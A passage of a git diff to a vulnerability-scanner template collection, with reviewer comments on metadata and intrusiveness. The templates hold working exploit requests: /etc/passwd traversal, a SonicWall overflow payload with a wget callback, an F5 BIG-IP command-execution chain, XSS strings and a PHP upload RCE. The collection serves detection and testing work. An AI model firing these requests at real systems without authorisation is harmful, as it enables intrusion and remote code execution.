https://cxsecurity.com/issue/WLB-2020010234 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8641 + cwe-id: CWE-22 + description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter." + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 
diff --git a/poc/cve/cve-2020-8654(1).yaml b/poc/cve/cve-2020-8654(1).yaml new file mode 100644 index 0000000000..83629c7d1c --- /dev/null +++ b/poc/cve/cve-2020-8654(1).yaml @@ -0,0 +1,41 @@ +id: CVE-2020-8654 +info: + name: EyesOfNetwork 5.3 - Authenticated RCE + author: praetorian-thendrickson + severity: high + description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi). + reference: + - https://github.com/h4knet/eonrce + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb + - https://nvd.nist.gov/vuln/detail/CVE-2020-8657 + - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8654 + cwe-id: CWE-78 + tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated +requests: + - method: GET + path: + - "{{BaseURL}}/css/eonweb.css" + extractors: + - type: regex + name: version + internal: true + part: body + group: 1 + regex: + - '# VERSION : ([0-9.]+)' + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version, '< 5.4', '>= 5.1') + - type: word + part: body + words: + - "EyesOfNetwork" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-9043(1).yaml b/poc/cve/cve-2020-9043(1).yaml new file mode 100644 index 0000000000..a69d7a2a55 --- /dev/null +++ b/poc/cve/cve-2020-9043(1).yaml 
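Review bot: This template never exercises the issue: it reads a version string from `/css/eonweb.css` and matches on `compare_versions(version, '< 5.4', '>= 5.1')`, yet it is named "Authenticated RCE", rated high and tagged `rce,authenticated`. A hit is a version fingerprint only, and the file should say so, for example with `# version-based detection only; does not confirm exploitability`. The reference list also links `https://nvd.nist.gov/vuln/detail/CVE-2020-8657` while `cve-id` is CVE-2020-8654; the NVD entry for the declared id should be listed.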
@@ -0,0 +1,64 @@ +id: CVE-2020-9043 +info: + name: WordPress wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation + author: scent2d + severity: high + description: | + The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key for Wordpress Admin Account. + reference: + - https://wpscan.com/vulnerability/10074 + - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 + - https://wordpress.org/plugins/wp-central/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-9043 + cwe-id: CWE-200 + metadata: + verified: "true" + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/index.php HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 + Host: {{Hostname}} + redirects: true + max-redirects: 2 + cookie-reuse: true + req-condition: true + matchers: + - type: dsl + dsl: + - "contains(all_headers_4, 'text/html')" + - "status_code_4 == 200" + - "contains(body_4, 'wpCentral Connection Key')" + - contains(body_4, "pagenow = \'dashboard\'") + condition: and + extractors: + - type: regex + name: authkey + part: body + group: 1 + regex: + - 'style="word-wrap:break-word;">([a-z0-9]+)' + internal: true + - type: regex + name: nonce + part: body + group: 1 + regex: + - '_wpnonce=([0-9a-z]+)' + internal: true diff --git a/poc/cve/cve-20200924a.yaml b/poc/cve/cve-20200924a.yaml new file mode 100644 index 0000000000..7bfd8f9b88 --- /dev/null +++ b/poc/cve/cve-20200924a.yaml 
@@ -0,0 +1,33 @@ +id: CVE-20200924a +info: + name: Web requests can navigate outside of DRP controlled areas - Directory traversal + author: c-sh0 + severity: critical + description: Web requests can navigate outside of DRP controlled areas - Directory traversal + reference: + - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html + - https://docs.rackn.io/en/latest/doc/release.html + - https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags + - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others) + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-20200924a + cwe-id: CWE-22 + tags: cve,cve2020,lfi,rackn,digitalrebar +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'X-Drp-Sha256sum:' + - type: regex + regex: + - "root:.*:0:0" diff --git a/poc/cve/cve-2021-20038-5443.yaml b/poc/cve/cve-2021-20038-5443.yaml new file mode 100644 index 0000000000..3829b17fc3 --- /dev/null +++ b/poc/cve/cve-2021-20038-5443.yaml 
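Review bot: `CVE-20200924a` is not a CVE identifier; judging by the first reference it is the vendor's own advisory label (`cve_20200924A`), yet it is used for both `id` and `classification.cve-id`. Tooling that joins findings to CVE feeds on `cve-id` will not resolve it, and the `cve,cve2020` tags place the template in CVE-only scan sets. I would remove the `cve-id` line unless a real CVE has been assigned. The "Affected versions - v4.3.0, ..." entry is not a URL and belongs in the description rather than under `reference`.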
@@ -0,0 +1,38 @@ +id: CVE-2021-20038 +info: + name: SonicWall SMA100 Stack BoF to Unauthenticated RCE + author: dwisiswant0, jbaines-r7 + severity: critical + description: | + A Stack-based buffer overflow vulnerability in SMA100 + Apache httpd server's mod_cgi module environment variables + allows a remote unauthenticated attacker to potentially + execute code as a 'nobody' user in the appliance. + This vulnerability affected SMA 200, 210, 400, 410 and 500v + appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, + 10.2.1.2-24sv and earlier versions. + reference: + - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis + tags: cve,cve2021,overflow,rce,sonicwall + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20038 + cwe-id: CWE-787 +requests: + - raw: + - | + GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1 + Host: {{Hostname}} + attack: clusterbomb + payloads: + prefix_addr: + - "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address + system_addr: + - "%08%b7%06%08" # for 10.2.1.2-24sv + - "%64%b8%06%08" # for 10.2.1.1-1[79]sv + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/cve/cve-2021-21287-5492.yaml b/poc/cve/cve-2021-21287-5492.yaml deleted file mode 100644 index ba8af857bf..0000000000 --- a/poc/cve/cve-2021-21287-5492.yaml +++ /dev/null 
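Review bot: The request in this template sends a stack-overflow payload with hard-coded addresses, but the tags line carries no `intrusive` marker, so it will run in scans configured to exclude intrusive checks. An address that does not fit the running firmware can plausibly crash the handling process on a production appliance, so I would change the line to `tags: cve,cve2021,overflow,rce,sonicwall,intrusive`. The payload comments cover only two firmware builds (`10.2.1.2-24sv` and `10.2.1.1-1[79]sv`), so a non-match on other builds says nothing about exposure. That limit should be stated in the description.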
@@ -1,38 +0,0 @@ -id: CVE-2021-21287 -info: - name: MinIO Browser API - Server-Side Request Forgery - author: pikpikcu - severity: high - description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability. - reference: - - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - - https://github.com/minio/minio/pull/11337 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N - cvss-score: 7.7 - cve-id: CVE-2021-21287 - cwe-id: CWE-918 - tags: cve,cve2021,minio,ssrf,oast -requests: - - raw: - - | - POST /minio/webrpc HTTP/1.1 - Host: {{interactsh-url}} - Content-Type: application/json - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Length: 76 - - {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" # Confirms the HTTP Interaction - - type: word - words: - - "We encountered an internal error" - -# Enhanced by mp on 2022/06/27 diff --git a/poc/cve/cve-2021-21745(1).yaml b/poc/cve/cve-2021-21745(1).yaml new file mode 100644 index 0000000000..c867bee9c3 --- /dev/null +++ b/poc/cve/cve-2021-21745(1).yaml 
@@ -0,0 +1,34 @@ +id: CVE-2021-21745 +info: + name: ZTE MF971R - Referer authentication bypass + author: gy741 + severity: medium + description: | + ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould + use this vulnerability to perform illegal authorization operations by sending a request to the user to click. + reference: + - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21745 + - https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2021-21745 + cwe-id: CWE-287 + tags: zte,auth-bypass,cve,cve2021,router +requests: + - raw: + - | + GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1 + Host: {{Hostname}} + Referer: http://interact.sh/127.0.0.1.html + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'psw_fail_num_str":"[0-9]' + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/21 diff --git a/poc/cve/cve-2021-21801-5531.yaml b/poc/cve/cve-2021-21801-5531.yaml new file mode 100644 index 0000000000..53fca1f877 --- /dev/null +++ b/poc/cve/cve-2021-21801-5531.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2021-21801 +info: + name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,rseenet,xss,graph + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21801 + cwe-id: CWE-79 +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22' + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + - 'Device Status Graph' + part: body + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-21803-5536.yaml b/poc/cve/cve-2021-21803-5536.yaml new file mode 100644 index 0000000000..3d5e278a05 --- /dev/null +++ b/poc/cve/cve-2021-21803-5536.yaml 
@@ -0,0 +1,27 @@
+id: CVE-2021-21803
+info:
+ name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS)
+ author: gy741
+ severity: medium
+ description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
+ reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+ tags: cve,cve2021,r-seenet,xss
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"zlo onerror=alert(1) "'
+ - 'Device Status Graph'
+ part: body
+ condition: and
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-22054(1).yaml b/poc/cve/cve-2021-22054(1).yaml
new file mode 100644
index 0000000000..1599beb9ec
--- /dev/null
+++ b/poc/cve/cve-2021-22054(1).yaml
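Review bot: This template has no `classification` block, so it carries no `cve-id`, `cwe-id` or CVSS data, although the sibling template for CVE-2021-21801 in the same commit has all of them. The description is the sibling's text and never mentions the `is2sim` parameter that the request tests. The tag is `r-seenet` here and `rseenet` in the sibling, so a tag filter will select only one of the two. I would add `classification:` with `cve-id: CVE-2021-21803` and `cwe-id: CWE-79`, and settle on one tag spelling.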
@@ -0,0 +1,32 @@
+id: CVE-2021-22054
+info:
+ name: VMWare Workspace ONE UEM - Server-Side Request Forgery
+ author: h1ei1
+ severity: high
+ description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
+ reference:
+ - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
+ - https://www.vmware.com/security/advisories/VMSA-2021-0029.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22054
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-22054
+ cwe-id: CWE-918
+ metadata:
+ fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx"
+ tags: cve,cve2021,vmware,workspace,ssrf
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Interactsh Server"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/poc/cve/cve-2021-22145-5591.yaml b/poc/cve/cve-2021-22145-5591.yaml
new file mode 100644
index 0000000000..8f8afb81a1
--- /dev/null
+++ b/poc/cve/cve-2021-22145-5591.yaml
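Review bot: The `Url` value in `path` is an opaque encoded blob with no comment saying what it decodes to, so a reviewer cannot tell from the template which outbound destination the scanned server is asked to fetch. The word matcher `"Interactsh Server"` then depends on the banner text of that third-party host staying unchanged, and it has no `part`, which leaves the match location implicit. I would add a comment above `path` such as `# Url is the encoded form of <DESTINATION_URL>; regenerate it if the callback host changes` and set `part: body` on the word matcher.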
@@ -0,0 +1,37 @@
+id: CVE-2021-22145
+info:
+ name: ElasticSearch 7.13.3 - Memory disclosure
+ author: dhiyaneshDk
+ severity: medium
+ description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
+ reference:
+ - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22145
+ - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
+ - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2021-22145
+ cwe-id: CWE-209
+ tags: cve,cve2021,elasticsearch
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/_bulk'
+ headers:
+ Content-Type: application/json
+ body: |
+ @
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'root_cause'
+ - 'truncated'
+ - 'reason'
+ part: body
+ condition: and
+ - type: status
+ status:
+ - 400
diff --git a/poc/cve/cve-2021-22214-5601.yaml b/poc/cve/cve-2021-22214-5601.yaml
deleted file mode 100644
index 7ab4f3ff4a..0000000000
--- a/poc/cve/cve-2021-22214-5601.yaml
+++ /dev/null
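Review bot: The request body is a lone `@` with no comment explaining it, so the next maintainer cannot tell whether it is a placeholder or the intended input. A line such as `# body is deliberately malformed; the 400 error text is what the matchers inspect` above `body:` would record the intent. The `name` mentions only 7.13.3 while the description gives the affected range as 7.10.0 to 7.13.3, so the title understates the scope.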
@@ -1,41 +0,0 @@ -id: CVE-2021-22214 -info: - name: Gitlab CE/EE 10.5 - Server-Side Request Forgery - author: Suman_Kar,GitLab Red Team - severity: high - description: | - GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are: - - CVE-2021-39935 - - CVE-2021-22214 - - CVE-2021-22175 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39935 - - https://nvd.nist.gov/vuln/detail/CVE-2021-22175 - - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - - https://docs.gitlab.com/ee/api/lint.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2021-22214,CVE-2021-39935,CVE-2021-22175 - cwe-id: CWE-918 - metadata: - shodan-query: http.title:"GitLab" - tags: cve,cve2021,gitlab,ssrf -requests: - - method: POST - path: - - "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true" - headers: - Content-Type: application/json - body: | - {"content": "include:\n remote: http://127.0.0.1:9100/test.yml"} - redirects: true - max-redirects: 3 - matchers: - - type: word - part: body - words: - - "does not have valid YAML syntax" - -# Enhanced by mp on 2022/06/27 diff --git a/poc/cve/cve-2021-22986-5612.yaml b/poc/cve/cve-2021-22986-5612.yaml new file mode 100644 index 0000000000..714ad3c19a --- /dev/null +++ b/poc/cve/cve-2021-22986-5612.yaml 
@@ -0,0 +1,60 @@
+id: CVE-2021-22986
+
+info:
+ name: F5 BIG-IP iControl REST - Remote Command Execution
+ author: rootxharsh,iamnoooob
+ severity: critical
+ description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
+ reference:
+ - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
+ - https://support.f5.com/csp/article/K03009991
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-22986
+ tags: bigip,cve,cve2021,rce,mirai,kev
+
+requests:
+ - raw:
+ - |
+ POST /mgmt/shared/authn/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ Authorization: Basic YWRtaW46
+ Content-Type: application/json
+ Cookie: BIGIPAuthCookie=1234
+
+ {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
+ - |
+ POST /mgmt/tm/util/bash HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ X-F5-Auth-Token: {{token}}
+ Content-Type: application/json
+
+ {"command":"run","utilCmdArgs":"-c id"}
+
+ extractors:
+ - type: regex
+ part: body
+ internal: true
+ name: token
+ group: 1
+ regex:
+ - "([A-Z0-9]{26})"
+
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "\"commandResult\":\"(.*)\""
+
+ matchers:
+ - type: word
+ words:
+ - "commandResult"
+ - "uid="
+ condition: and
+
+# Enhanced by mp on 2022/05/05
diff --git a/poc/cve/cve-2021-23241-5621.yaml b/poc/cve/cve-2021-23241-5621.yaml
new file mode 100644
index 0000000000..51758557d4
--- /dev/null
+++ b/poc/cve/cve-2021-23241-5621.yaml
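Review bot: The second request runs a command on the scanned host through `/mgmt/tm/util/bash`, yet `tags` does not include `intrusive`, so a scan profile that excludes intrusive templates will still execute it. I would change the line to `tags: bigip,cve,cve2021,rce,mirai,kev,intrusive`. The second, unnamed extractor copies the whole `commandResult` value into scan output, where it ends up in reports and logs; the word matcher already proves the result, so that extractor could be dropped. The word matcher has no `part`, there is no status matcher, and `classification` has no `cwe-id`.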
@@ -0,0 +1,30 @@
+id: CVE-2021-23241
+info:
+ name: Mercury Router Web Server Directory Traversal
+ author: daffainfo
+ severity: medium
+ description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
+ reference:
+ - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-23241
+ - https://www.mercusys.com/en/
+ - https://www.mercurycom.com.cn/product-521-1.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-23241
+ cwe-id: CWE-22
+ tags: cve,cve2021,iot,lfi,router
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/loginLess/../../etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-24146-5631.yaml b/poc/cve/cve-2021-24146-5631.yaml
deleted file mode 100644
index 61d3d453df..0000000000
--- a/poc/cve/cve-2021-24146-5631.yaml
+++ /dev/null
@@ -1,32 +0,0 @@ -id: CVE-2021-24146 - -info: - name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export - description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example. - author: random_robbie - severity: high - reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc - tags: wordpress,wp-plugin,cve,cve2021 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.50 - cve-id: CVE-2021-24146 - cwe-id: CWE-284 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv" - - matchers-condition: and - matchers: - - type: word - words: - - "mec-events" - - "text/csv" - condition: and - part: header - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-24236(1).yaml b/poc/cve/cve-2021-24236(1).yaml deleted file mode 100644 index cc0cd70f13..0000000000 --- a/poc/cve/cve-2021-24236(1).yaml +++ /dev/null 
@@ -1,80 +0,0 @@ -id: CVE-2021-24236 -info: - name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload - author: pussycat0x - severity: critical - description: | - The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, however only checks for the Content-Type in the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE. - reference: - - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea - - https://wordpress.org/plugins/imagements/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-24236 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-24236 - cwe-id: CWE-434 - tags: cve,cve2021,upload,rce,wordpress,wp-plugin,imagements,wp,unauth -variables: - php: "{{to_lower('{{randstr}}')}}.php" - post: "1" -requests: - - raw: - - | - POST /wp-comments-post.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU - - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="comment" - - {{randstr}} - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="author" - - {{randstr}} - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="email" - - {{randstr}}@email.com - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="url" - - - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="checkbox" - - yes - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="naam" - - {{randstr}} - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="image"; filename="{{php}}" - Content-Type: image/jpeg - - - - 
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="submit" - - Post Comment - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="comment_post_ID" - - {{post}} - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="comment_parent" - - 0 - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU-- - - | - GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: word - part: body_2 - words: - - "CVE-2021-24236" diff --git a/poc/cve/cve-2021-24275-5661.yaml b/poc/cve/cve-2021-24275-5661.yaml deleted file mode 100644 index 89211570dd..0000000000 --- a/poc/cve/cve-2021-24275-5661.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2021-24275 -info: - name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) - author: dhiyaneshDK - severity: medium - description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-24275 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - '' - condition: and - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header diff --git a/poc/cve/cve-2021-24284(1).yaml b/poc/cve/cve-2021-24284(1).yaml deleted file mode 100644 index f2e969c7a6..0000000000 --- a/poc/cve/cve-2021-24284(1).yaml +++ /dev/null 
@@ -1,62 +0,0 @@ -id: CVE-2021-24284 -info: - name: WordPress Kaswara Modern VC Addons - File Upload RCE - author: lamscun,pussycat0x,pdteam - severity: critical - description: | - The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. - reference: - - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 - - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 - - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ - - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ - - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-24284 - cwe-id: CWE-434 